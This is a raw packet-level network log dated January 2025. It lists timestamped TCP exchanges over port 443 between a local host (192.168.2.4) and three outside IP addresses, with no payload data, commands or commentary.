                                                                                                                                                                                                Jan 5, 2025 18:02:27.844865084 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:27.844904900 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:27.845037937 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:27.845318079 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:27.845339060 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:28.299873114 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:28.299989939 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:28.306575060 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:28.306586027 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:28.306824923 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:28.308090925 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:28.308131933 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:28.308157921 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:28.770783901 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:28.770889997 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:28.771039009 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:28.771119118 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:28.771131039 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:28.771146059 CET49756443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:28.771151066 CET44349756188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:28.878887892 CET49757443192.168.2.4185.161.251.21
                                                                                                                                                                                                Jan 5, 2025 18:02:28.878927946 CET44349757185.161.251.21192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:28.879008055 CET49757443192.168.2.4185.161.251.21
                                                                                                                                                                                                Jan 5, 2025 18:02:28.879288912 CET49757443192.168.2.4185.161.251.21
                                                                                                                                                                                                Jan 5, 2025 18:02:28.879302025 CET44349757185.161.251.21192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:29.529057980 CET44349757185.161.251.21192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:29.529144049 CET49757443192.168.2.4185.161.251.21
                                                                                                                                                                                                Jan 5, 2025 18:02:29.530842066 CET49757443192.168.2.4185.161.251.21
                                                                                                                                                                                                Jan 5, 2025 18:02:29.530864954 CET44349757185.161.251.21192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:29.531264067 CET44349757185.161.251.21192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:29.532896996 CET49757443192.168.2.4185.161.251.21
                                                                                                                                                                                                Jan 5, 2025 18:02:29.579330921 CET44349757185.161.251.21192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:29.790472031 CET44349757185.161.251.21192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:29.790558100 CET44349757185.161.251.21192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:29.790613890 CET49757443192.168.2.4185.161.251.21
                                                                                                                                                                                                Jan 5, 2025 18:02:29.790823936 CET49757443192.168.2.4185.161.251.21
                                                                                                                                                                                                Jan 5, 2025 18:02:29.790841103 CET44349757185.161.251.21192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:29.790857077 CET49757443192.168.2.4185.161.251.21
                                                                                                                                                                                                Jan 5, 2025 18:02:29.790860891 CET44349757185.161.251.21192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:29.823213100 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:29.823255062 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:29.823332071 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:29.823646069 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:29.823658943 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.287324905 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.287391901 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.289581060 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.289591074 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.289913893 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.292740107 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.339332104 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.554622889 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.554677010 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.554721117 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.554724932 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.554738998 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.554779053 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.554785013 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.554841995 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.554879904 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.554886103 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.555097103 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.555140972 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.555145979 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.559250116 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.559299946 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.559300900 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.559320927 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.559371948 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.559376955 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.608458996 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.641164064 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.641263008 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.641303062 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.641309023 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.641381979 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.641423941 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.641428947 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.641931057 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.641971111 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.641983986 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.641992092 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.642038107 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.642258883 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.642338991 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.642376900 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.642383099 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.642390013 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.642437935 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.642442942 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.642975092 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643014908 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643021107 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643027067 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643069029 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643074036 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643126965 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643163919 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643170118 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643879890 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643919945 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643927097 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643933058 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643980980 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.643985033 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.684834003 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.684889078 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.684896946 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.728123903 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.728171110 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.728189945 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.728195906 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.728246927 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.728251934 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.728662968 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.728713036 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.728724003 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.728724957 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.728758097 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.728764057 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.729104042 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.729151011 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.729155064 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.729171991 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.729209900 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.729216099 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.729223013 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.729264975 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.729954958 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.730000019 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.730010986 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.730015039 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.730042934 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.730844975 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.730895996 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.730897903 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.730907917 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.730951071 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.731015921 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.731066942 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.731071949 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.731117964 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.731874943 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.731930017 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.731939077 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.731977940 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.731996059 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.732000113 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.732033014 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.772030115 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.772177935 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.772183895 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.772260904 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.814831972 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.814898014 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.814970970 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.815030098 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.815418959 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.815475941 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.815917969 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.815970898 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.815973043 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.815983057 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.816023111 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.816023111 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.816034079 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.816067934 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.816704988 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.816766024 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.816795111 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.816836119 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.816853046 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.816858053 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.816884995 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.817699909 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.817760944 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.817765951 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.817789078 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.817801952 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.817806005 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.817837954 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.818526983 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.818572998 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.818583965 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.818588018 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.818614960 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.818627119 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.818634987 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.818661928 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.818681002 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.819360971 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.819422960 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.819432020 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.819487095 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.819513083 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.819567919 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.820384979 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.820434093 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.820446014 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.820450068 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.820482969 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.821225882 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.821270943 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.821280003 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.821284056 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.821309090 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.821319103 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.821357965 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.821362019 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.821403980 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.821989059 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.822043896 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.822043896 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.822056055 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.822092056 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.822822094 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.822880983 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.858464003 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.858532906 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.901896954 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.901937008 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.901940107 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.901990891 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.901999950 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.902367115 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.902396917 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.902422905 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.902429104 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.902452946 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.902813911 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.902833939 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.902863979 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.902868986 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.902899027 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.902949095 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.902968884 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.903000116 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.903012991 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.903033972 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.904416084 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.904436111 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.904475927 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.904483080 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.904511929 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.905013084 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.905039072 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.905071974 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.905076981 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.905103922 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.905363083 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.905383110 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.905420065 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.905426979 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.905445099 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.945529938 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.945549965 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.945590973 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.945600033 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.945631981 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.988784075 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.988806963 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.988847971 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.988853931 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.988889933 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.988959074 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.988990068 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.989017963 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.989022970 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.989049911 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.989559889 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.989579916 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.989618063 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.989622116 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.989650011 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.989912987 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.989943027 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.989976883 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.989981890 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.990009069 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.990396023 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.990415096 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.990461111 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.990464926 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.990489006 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.990572929 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.990592003 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:30.990638018 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:30.990643024 CET44349758104.21.37.128192.168.2.4
